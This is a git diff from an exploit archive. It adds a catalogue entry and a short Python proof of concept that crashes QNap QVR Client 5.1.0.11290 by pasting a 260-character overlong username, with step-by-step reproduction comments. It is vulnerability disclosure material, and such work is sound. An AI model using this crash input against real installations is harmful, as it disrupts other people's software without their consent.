diff --git a/files.csv b/files.csv index 529ee3309..b6b5f3f97 100755 --- a/files.csv +++ b/files.csv @@ -34920,3 +34920,4 @@ id,file,description,date,author,platform,type,port 38641,platforms/multiple/webapps/38641.rb,"JSSE SKIP-TLS Exploit",2015-11-05,"Ramon de C Valle",multiple,webapps,0 38643,platforms/php/webapps/38643.txt,"WordPress Pie Register Plugin 'wp-login.php' Multiple Cross Site Scripting Vulnerabilities",2013-07-12,gravitylover,php,webapps,0 38646,platforms/jsp/webapps/38646.txt,"NXFilter 3.0.3 - Multiple XSS Vulnerabilities",2015-11-06,hyp3rlinx,jsp,webapps,0 +38650,platforms/windows/dos/38650.py,"QNap QVR Client 5.1.0.11290 - Crash PoC",2015-11-07,"Luis Martínez",windows,dos,0 diff --git a/platforms/windows/dos/38650.py b/platforms/windows/dos/38650.py new file mode 100755 index 000000000..7f5dc4941 --- /dev/null +++ b/platforms/windows/dos/38650.py @@ -0,0 +1,25 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- +# Exploit Title : QNap QVR Client 5.1.0.11290 Crash PoC +# Discovery by : Luis Martínez +# Email : l4m5@hotmail.com +# Discovery Date : 05/11/2015 +# Vendor Homepage: http://www.qnapsecurity.com/n/en/ +# Software Link : http://download.qnap.com/Surveillance/Utility/QMon_20150630.zip +# Tested Version : 5.1 +# Vulnerability Type : Denial of Service (DoS) Local +# Tested on OS : Windows 10 Pro x64 es +# Steps to Produce the Crash: +# 1.- Run python code : python qvr_client_5.1.py +# 2.- Open qvr_client_5.1.txt and copy content to clipboard +# 3.- Open QVR Client +# 4.- Direccion IP/Puerto -> 10.10.10.1 / 80 +# 5.- Paste ClipBoard on "Nombre de Usuario" +# 6.- Contraseña -> test +# 7.- Aceptar +# 8.- Crashed + +buffer = "\x41" * 260 +f = open ("qvr_client_5.1.txt", "w") +f.write(buffer) +f.close()